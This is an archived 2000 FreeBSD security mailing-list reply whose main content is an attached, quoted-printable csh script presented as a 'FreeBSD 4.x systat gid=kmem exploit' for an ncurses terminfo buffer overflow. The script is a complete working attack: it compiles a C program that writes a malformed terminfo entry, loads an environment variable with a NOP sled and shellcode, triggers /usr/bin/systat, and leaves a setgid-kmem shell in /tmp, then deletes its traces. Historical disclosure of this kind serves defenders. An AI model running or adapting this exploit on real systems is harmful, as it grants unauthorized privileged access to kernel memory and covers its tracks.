From owner-freebsd-security Tue Oct 10 7: 8:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.117.178]) by hub.freebsd.org (Postfix) with SMTP id 2B79137B66E for ; Tue, 10 Oct 2000 07:07:55 -0700 (PDT) Received: (qmail 21794 invoked from network); 10 Oct 2000 14:08:00 -0000 Received: from lagoon.freebsd.lublin.pl (qmailr@212.182.115.11) by yeti.ismedia.pl with SMTP; 10 Oct 2000 14:08:00 -0000 Received: (qmail 5703 invoked from network); 10 Oct 2000 14:08:03 -0000 Received: from riget.scene.pl (qmailr@212.182.115.2) by lagoon.freebsd.lublin.pl with SMTP; 10 Oct 2000 14:08:03 -0000 Received: (qmail 35965 invoked by uid 1001); 10 Oct 2000 14:07:37 -0000 Date: Tue, 10 Oct 2000 16:07:37 +0200 From: Przemyslaw Frasunek To: freebsd-security@freebsd.org Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010160736.N94343@riget.scene.pl> References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="x+6KMIRAuhnl3hBn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Tue, Oct 10, 2000 at 07:02:30AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --x+6KMIRAuhnl3hBn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > For those of you who don't subscribe to BUGTRAQ, here's a heads up. And the exploit (in attachment). -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * --x+6KMIRAuhnl3hBn Content-Type: application/x-sh Content-Disposition: attachment; filename="systat.sh" Content-Transfer-Encoding: quoted-printable #!/bin/csh=0A=0A###########################################################= ###################=0A# (c) 2000 Przemys=B3aw Frasunek #=0A# = #=0A# FreeBSD 4.x systat gid=3Dkmem exploit= #=0A# Idea by: Jouko Pynn=F6nen #=0A# = #=0A# Dedicated to ks= m. #=0A# = #=0A# Nud= zi=B3o mi si=EA w szkole, tote=BF napisa=B3em sploita na angielskim. :) = #=0A##################################################################= ############=0A=0Acat << __EOF__ > /tmp/xx=0A#!/bin/csh=0A=0Acp /bin/csh /t= mp=0A/usr/sbin/chgrp kmem /tmp/csh=0Achmod 2755 /tmp/csh=0A__EOF__=0A=0Achm= od 755 /tmp/xx=0A=0Acat << __EOF__ > /tmp/sploitte.c=0A#include = =0A#include =0A#include =0A=0A#define OFF -400=0A#define= ALIGN 516=0A=0Along getesp(void)=0A{=0A __asm__("movl %esp, %eax\n");=0A}= =0A=0Aint main(void)=0A{=0A /* precompiled malformed terinfo binary */=0A= =0A char evilcap[] =3D=0A "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02= \x73\x63\x72\x65"=0A "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\= x49\x20\x58"=0A "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x= 65\x72"=0A "\x6d\x69\x6e\x61\x6c";=0A=0A char retbuf[5];=0A long ret =3D ge= tesp() + OFF;=0A int i;=0A=0A write(2, evilcap, sizeof(evilcap)-1);=0A for = (i=3D0;i<39;i++) write(2, "\0", 1);=0A for (i=3D0;i<86;i++) write(2, "\xff"= , 1);=0A write(2, "\0\0", 2);=0A for (i=3D0;i<750;i++) write(2, "\xff", 1);= =0A for (i=3D0;i> 8),=0A (((int)ret & 0xff0= 000) >> 16),=0A (((int)ret & 0xff000000) >> 24));=0A write(2, retbuf, 5);= =0A}=0A__EOF__=0A=0Acc -o /tmp/s /tmp/sploitte.c=0Acd $HOME=0Amkdir -p .ter= minfo/s=0Asetenv TERM screen=0A/tmp/s >& .terminfo/s/screen=0Asetenv EGG `p= erl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\= xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e= \x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01= \x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`=0A/usr/= bin/systat >& /dev/null=0Arm -f .terminfo/s/screen=0Als -la /tmp/csh=0Arm -= f /tmp/xx /tmp/s /tmp/sploitte.c=0A --x+6KMIRAuhnl3hBn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message